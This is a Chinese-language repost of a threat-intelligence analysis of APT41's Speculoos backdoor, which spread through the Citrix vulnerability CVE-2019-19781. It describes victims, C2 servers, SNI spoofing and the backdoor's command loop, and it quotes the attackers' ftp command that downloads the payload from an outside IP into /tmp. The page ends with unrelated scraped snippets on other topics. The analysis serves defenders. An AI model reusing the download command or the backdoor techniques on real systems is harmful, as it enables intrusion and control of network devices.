2020年3月25日,FireEye發表了APT41全球攻擊活動報告。此攻擊活動發生在1月20日至3月11日期間,主要對Citrix,Cisco和Zoho網絡設備進行攻擊。研究人員根據WildFire和AutoFocus數據獲得了針對Citrix設備的攻擊樣本‘Speculoos’,還確定了北美,南美和歐洲等世界各地多個行業的受害者。
Speculoos的基于FreeBSD實現的,共識別出五個樣本,所有樣本文件大小基本相同,樣本集之間存在微小差異。Speculoos利用CVE-2019-19781進行攻擊傳播,CVE-2019-19781影響Citrix Application Delivery Controller,Citrix Gateway和Citrix SD-WAN WANOP等設備,允許攻擊者遠程執行任意命令。
攻擊者利用CVE-2019-19781遠程執行命令:'/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@ 66.42.98[.]220/<filename>'。
第一波攻擊始于2020年1月31日晚上,使用的文件名為bsd,影響了美國的多個高等教育機構,美國醫療機構和愛爾蘭咨詢公司。第二波攻擊始于2020年2月24日,使用文件名為un,影響了哥倫比亞高等教育機構,奧地利制造組織,美國高等教育機構以及美國的州政府。
基于BSD系統的惡意軟件相對少見,此工具和特定Citrix網絡設備有關,因此Speculoos很可能是APT41組織專為此攻擊活動研發的。
Speculoos后門是使用GCC 4.2.1編譯的ELF可執行文件,可在FreeBSD系統上運行。 該負載無法保持持對目標持久控制,因此攻擊者會使用額外的組件或其他攻擊手段維持控制。 后門執行后將進入循環,該循環調用函數通過443端口與C2域進行通信:
alibaba.zzux[.]com (119.28.139[.]120)
如果無法通信,Speculoos會嘗試通過443端口與119.28.139[.]20上的備份C2通信。如果連接到任一C2服務器,它將與服務器進行TLS握手。 圖1顯示了發送到C2服務器的數據包。
它請求login.live [.] com作為Server Name Indication(SNI)。
成功連接到C2并完成TLS握手后,Speculoos將對目標系統進行指紋識別,并將數據發送回C2服務器。其結構如下表1所示。
數據通過TLS通道發送,并且Speculoos會等待服務器的兩字節響應。 收到響應后,它將向C2發送一個字節(0xa),并進入循環等待命令。 表2為攻擊者可執行命令, 可讓攻擊者完全控制受害者系統。
研究中分析的兩個Speculoos樣本在功能上相同,兩者之間只有八個字節不同,在收集系統信息時‘hostname‘和‘uname -s’命令不同導致。uname -s返回內核信息,hostname返回主機系統名稱。 下圖顯示了兩個Speculoos樣本之間的二進制比較。
互聯網可訪問設備允許未經授權的用戶遠程執行代會帶來很大的安全問題,CVE-2019-19781影響了多個面向互聯網的設備,攻擊者積極利用此漏洞來安裝自定義后門。受影響組織大量的網絡活動都必須經過這些網絡設備,攻擊者可以監視或修改整個組織的網絡活動。
默認情況下通過這些設備可以直接訪問組織系統內部,攻擊者無需考慮內部網絡橫向移動的問題。攻擊者可以修改網絡流量,注入惡意代碼,執行中間人攻擊,或將用戶重定向到虛假登錄頁面來收集登錄憑證。
關于如何進行APT41 Speculoos后門分析就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
本文由 貴州做網站公司 整理發布,部分圖文來源于互聯網,如有侵權,請聯系我們刪除,謝謝!
c語言中正確的字符常量是用一對單引號將一個字符括起表示合法的字符常量。例如‘a’。數值包括整型、浮點型。整型可用十進制,八進制,十六進制。八進制前面要加0,后面...
2022年天津專場考試原定于3月19日舉行,受疫情影響確定延期,但目前延期后的考試時間推遲。 符合報名條件的考生,須在規定時間登錄招考資訊網(www.zha...
:喜歡聽,樂意看。指很受歡迎?!巴卣官Y料”喜聞樂見:[ xǐ wén lè jiàn ]詳細解釋1. 【解釋】:喜歡聽,樂意看。指很受歡迎。2. 【示例】:這是...
雙創50ETF是什么基金?雙創50ETF是以雙創50指數及成分股為投資標的的指數型基金。雙創50ETF旨在跟蹤雙創50指數的走勢,其投資標的與雙創50成分股基本一致。 雙創50指數是從科創板和創業板中選出50只最具代表性的股票編制而成的指數,這50只股票基本都是a股市場上科技龍頭企業。雙創50指數的特點1、盈利與創新平衡:雙創50指數標的中創業板的股票一 般為成熟的科技龍頭,盈利較為穩定,而科創板...
金融危機的根源是什么?一、泡沫經濟的形成。泡沫經濟逐漸膨脹到一定程度時就會破裂,資金鏈斷裂相繼引起一系列的連鎖反應,而種種連鎖反應對金融領域、實體經濟、企業和民眾造成一系列的惡性影響。據調查分析,1994-2001 年的 7 年間,美國房價不過上升了 53.1%的比例,而 2001-2007年間,美國的房價卻上升了 63.4%的比例,信用的極度擴張后,最后帶來的一定是極度的收縮,特別是房地產行業,...
【資料圖】在生活中,很多人都不知道國家圖書館開放時間是什么意思,其實他的意思是非常簡單的,下面就是小編搜索到的國家圖書館開放時間相關的一些知識,我們一起來學習下吧!1、總館南區:周一至周日9:00-17:00,總館北區:周一至周五9:00--21:00,周六至周日9:00--17:00,少年兒童館:周一至周日9:00--17:00,古籍館:周一至周五9:00--17:00。2、中國國家圖書館前身是...